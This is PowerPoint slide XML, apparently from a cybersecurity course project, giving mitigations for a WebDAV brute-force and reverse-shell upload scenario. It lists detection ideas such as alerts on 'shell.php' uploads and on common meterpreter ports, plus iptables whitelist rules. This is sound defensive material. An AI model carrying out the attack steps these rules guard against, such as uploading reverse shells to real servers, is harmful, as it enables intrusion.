                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8921F56D-72D6-4F91-BA4A-D4C48DEB13E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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25</a:t>
            </a:fld>
            <a:endParaRPr sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72B9F777-A740-466D-B087-EE04896C04F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mitigation: Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="Google Shape;1232;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4695982"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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What kind of alarm can be set to detect future access to this directory?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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An alarm to trigger when a request to the directory is made from an IP address that is not whitelisted. </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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I would set the threshold to everything grater than 0.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233" name="Google Shape;1233;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355615" y="1604700"/>
            <a:ext cx="5158333"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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What configuration can be set on the host to control access?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-2857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Software specific updates and patches need to be up to date.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-2857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Don`t store instructions on how to access the webserver in any directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-2857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Whitelist the IP addresses which need to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-2857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Blacklist IP`s were detected during the Brute-Force-Attack.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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 b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Iptables –A INPUT –s (trusted IP address) –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –m multiport –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>80,443 –j ACCEPT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iptables -A INPUT -s (untrusted IP address) -j DROP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Not having instruction on how to access the webserver in your filesystem </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>will mitigate the chance of being successfully exploited, whitelisting </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP addresses ensures that no unauthorized IP`s are able to establish a connection to the webserver.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2244191B-B735-4909-8D3E-224365D292C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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26</a:t>
            </a:fld>
            <a:endParaRPr sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1DE2BF9-429A-4B09-937E-D94355A1B24F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1240" name="Google Shape;1240;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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What kind of alarm can be set to detect future file uploads?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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An alert that triggers when invalid file types like .php are uploaded to the web server.</a:t>
            </a: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An alert if upload are made by common meterpreter ports like</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4444, 3389, 5555 and 3790.</a:t>
            </a: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Alert on traffic that is not expected.</a:t>
            </a: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Also try to filter traffic on ports 80 and 443 for suspicious activity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The threshold would be set to trigger if any file is being uploaded by any IP and contains a invalid type of file, for example “shell.php”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355615" y="1604700"/>
            <a:ext cx="5074572"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b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What configuration can be set on the host to block file uploads?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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Require a authentication when uploading files.</a:t>
            </a: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Define valid types of files that users should be allowed to upload.</a:t>
            </a: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Store uploaded files in a location not accessible from the web browser. </a:t>
            </a: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Scramble uploaded filenames and extensions.</a:t>
            </a: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Disable remote uploads and allow local uploads only.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide the required command line. </a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authentication should be required to upload files. It's possible to store uploaded </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>files outside of the web root, in a database, or in a folder that is configured as inaccessible using the web server configuration. The result is that even if an attacker is able to upload a shell, the attacker won't be able to access it.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shell upload vulnerabilities can be effectively prevented by blocking direct </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>access to uploaded files and limiting the ability of users to upload files.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0492A07D-2391-475E-B69F-FCBDD08B2A59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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27</a:t>
            </a:fld>
            <a:endParaRPr sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{759C18BB-3F16-427C-9A78-7D5B8722699D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203"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latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Topology </a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>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200" b="1" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Address Range: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Netmask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
